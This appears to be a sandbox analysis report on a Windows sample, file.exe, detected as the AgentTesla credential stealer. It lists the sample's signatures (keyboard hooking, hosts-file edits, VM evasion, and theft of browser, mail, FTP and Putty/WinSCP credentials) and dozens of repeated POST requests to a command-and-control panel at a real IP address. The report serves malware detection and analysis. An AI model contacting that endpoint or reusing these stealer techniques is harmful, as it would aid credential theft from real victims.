Loading ...

Play interactive tourEdit tour

Analysis Report file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:339128
MD5:2e1fcfb191508fc51320313d059bd30d
SHA1:18254fc83a340ca9562844542425ed7f995bff4a
SHA256:5dd60a5a2e5f074435cb438d3e229d1a3c4e4ef35c9c886a356b52aeb83265cd
Tags:exe

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
.NET source code contains very large array initializations
Installs a global keyboard hook
Machine Learning detection for sample
Modifies the hosts file
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Enables debug privileges
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w10x64
  • file.exe (PID: 5448 cmdline: 'C:\Users\user\Desktop\file.exe' MD5: 2E1FCFB191508FC51320313D059BD30D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
file.exeJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000000.00000002.613159789.0000000003001000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.610250985.00000000008D2000.00000002.00020000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000000.00000002.614009844.00000000031DD000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000000.00000000.228406188.00000000008D2000.00000002.00020000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 2 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.8d0000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                0.0.file.exe.8d0000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

                  Sigma Overview

                  No Sigma rule has matched

                  Signature Overview

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection:

                  barindex
                  Antivirus / Scanner detection for submitted sampleShow sources
                  Source: file.exeAvira: detected
                  Multi AV Scanner detection for submitted fileShow sources
                  Source: file.exeVirustotal: Detection: 53%Perma Link
                  Source: file.exeReversingLabs: Detection: 47%
                  Machine Learning detection for sampleShow sources
                  Source: file.exeJoe Sandbox ML: detected
                  Source: file.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                  Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
                  Source: file.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Source: Binary string: mscorrc.pdb source: file.exe, 00000000.00000002.611154670.0000000000FC0000.00000002.00000001.sdmp
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 378Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 378Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 378Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 378Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 378Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 378Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 378Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 378Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 378Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 378Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 378Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 380Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 574Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 3420Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /webpanel-trade/inc/eea5c8636b504d.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 376Expect: 100-continue
